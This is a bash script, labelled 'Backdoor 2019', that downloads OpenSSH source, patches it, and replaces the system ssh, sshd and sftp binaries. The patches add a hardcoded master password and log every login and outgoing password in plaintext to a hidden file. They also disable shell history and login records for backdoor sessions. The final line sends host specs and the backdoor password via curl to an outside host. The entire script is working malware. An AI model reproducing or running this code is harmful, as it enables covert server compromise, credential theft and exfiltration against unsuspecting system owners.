pwned.sh

1. #!/bin/bash
2. #Backdoor 2019 [Qadimoun]
3.  
4. sysctl -w net.ipv6.conf.all.disable_ipv6=1
5. sysctl -w net.ipv6.conf.default.disable_ipv6=1
6.  
7. # Set global recursive dns for non-failure backdoor tools hosts resolution.
8. echo '[Q] Resetting resolv.conf'
9. echo 'nameserver 8.8.8.8' >/etc/resolv.conf
10. # Install Gcc and reqs..
11. yum install gcc make -y
12. apt-get install gcc make -y
13. yum install gcc openssl-devel libz libz-devel -y
14. apt-get install openssl-dev libz libz-dev -y
15. # Let the fun start
16. DIST=`cat /etc/issue |head -1 |cut -d " " -f 1`
17. CPU1=`cat /proc/cpuinfo |grep processor |tail -1 |cut -d ":" -f 2 |cut -d " " -f 2`
18. CPU2=`echo 1`
19. CPU=$((CPU1 + CPU2))
20. MEM=`free -m |head -2 |tail -1 |cut -d ":" -f 2 |sed -n '/ /s/  */ /gp' |cut -d " " -f 2`
21. STORAGE=`df --total |sed -n '/ /s/  */ /gp'|cut -d " " -f 2 |grep -v blocks |awk '{s+=$1} END {print s}' |awk '{ byte =$1 /1024/1024; print byte "GB" }'`
22.  
23. PASSWORD=`shuf -i 1-10000000000000000000 -n 1`
24. SNIFFILE='/usr/local/.logs'
25. #curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST
26.  
27. BACKDOOR_INC="patch.h"
28. FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"
29. #HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"
30. HOST="http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/"
31. OK="OK"
32. FAIL="Failed"
33.  
34. echo "ENJOY..."
35. if [ -z $PASSWORD ]; then
36.     echo $PASSWORD | md5sum |cut -d " " -f 1
37. fi
38.  
39. if [ -z $SNIFFILE ]; then
40. echo -n ">>> logfile path: /usr/local/include/uconf.h"
41. SNIFFILE="/usr/local/include/uconf.h"
42. touch "/usr/local/include/uconf.h"
43. chmod o+wr "/usr/local/include/uconf.h"
44. echo "Do not remove /usr/local/include/uconf.h"
45. fi
46.  
47. echo -n "checking for sshd_config...    "
48. SSHDCONFIG="/etc/ssh"
49. if [ -f $SSHDCONFIG/sshd_config ]; then
50.         echo "$OK  ($SSHDCONFIG)"
51. fi
52.  
53. if [ -z "$SSHDCONFIG" ]; then
54.         echo "$FAIL"
55.         echo -n ">>> sshd_config path: "
56. fi
57.  
58. # ssh
59. echo -n "checking for OpenSSH binary... "
60. SSH=$(which ssh)
61. if [ -z "$SSH" ]; then
62.         echo "$FAIL"
63.         exit
64. fi
65. echo "$OK  ($SSH)"
66.  
67. # wget
68. echo -n "checking for wget/curl binary... "
69. WGET=$(which curl)
70. WGET_FLAG="-O"
71. if [ -z "$WGET" ]; then
72.         WGET=$(which wget)
73.         if [ -z "$WGET" ]; then
74.                 echo "$FAIL"
75.                 exit
76.         else
77.                 WGET_FLAG="-qc"
78.         fi
79. fi
80. echo "   $OK  ($WGET)"
81.  
82. # check ssh version
83. echo -n "checking OpenSSH version... "
84. SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/')
85. SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}')
86. SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//')
87. if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then
88.         echo $FAIL;
89.         exit
90. fi
91. echo "   $OK  ($SSH_VERSION)"
92.  
93.  
94. # get ssh
95. OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)
96. echo "downloading source..."
97. $WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&
98. #echo "          $OK" &&
99. echo -n "extracting tarball..." &&
100. tar xzf $OPENSSH.tar.gz &&
101. echo "          $OK" &&
102. cd $OPENSSH
103.  
104.  
105. # check file sanity
106. echo -n "checking file sanity..."
107. for FILE in $FILES; do
108.         if [ ! -f $FILE ];then
109.                 printf "$FILE not found.\n"
110.                 exit
111.         fi
112.         cp $FILE $FILE.bak
113. done
114. echo "        $OK"
115.  
116. echo "generating patches..."
117. BACKDOOR_BUF=\
118. "#ifndef __HAVE_PATCH_H
119. #define __HAVE_PATCH_H
120. #define PATCHPASS \"$PASSWORD\"
121. #define SNFLOG \"$SNIFFILE\"
122. int patch_on;
123. #endif"
124. printf "$BACKDOOR_BUF" > $BACKDOOR_INC
125.  
126.  
127. # patch files
128. echo "  patching auth.c...           $OK"
129. sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp
130. echo "  patching loginrec.c...       $OK"
131. sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp
132. echo "  patching auth-passwd.c...    $OK"
133. sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp
134. echo " patching session.c...             $OK"
135. sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp
136. echo "  patching sshconnect1.c...    $OK"
137. sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp
138. echo "  patching sshconnect2.c...    $OK"
139. LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1)
140. sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp
141. echo "  patching includes.h...    $OK"
142. sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp
143.  
144.  
145. # move files
146. for FILE in $FILES; do
147.         mv $FILE.tmp $FILE
148. done
149. echo "done."
150. echo "building source..."
151.  
152. echo
153. echo Variables:
154. echo " \$SSH_VERSION  =  $SSH_VERSION"
155. echo " \$SSHDCONFIG   = $SSHDCONFIG"
156. echo " \$PASSWORD     = $PASSWORD"
157.  
158. SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}')
159. if [ -z $SSH_DISTRO ]; then
160. echo "Keeping current version.h"
161. else
162. echo "SSH Distro: $SSH_DISTRO"
163. sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp
164. rm -rf version.h
165. mv version.h.tmp version.h
166. fi
167.  
168. # start build
169. USEPAM=`cat /etc/ssh/sshd_config|grep -i usepam`
170. cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials
171. if [ -z $USEPAM ];then
172. echo "Configuring --with-pam"
173. OPT_PAM=""
174. else
175. echo "Configuring without PAM"
176. OPT_PAM=""
177. fi
178. if [ -z $KERB ]; then
179. echo "Configuring --with-kerberos5"
180. OPT_KERB=""
181. else
182. echo "Configuring without kerb5"
183. OPT_KERB=""
184. fi
185. echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"
186. ./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd sftp
187.  
188. printf "patched OpenSSH ready.\n"
189. mv sshd /usr/sbin/sshd
190. mv ssh /usr/bin/ssh
191. mv sftp /usr/bin/sftp
192. service sshd restart
193. curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST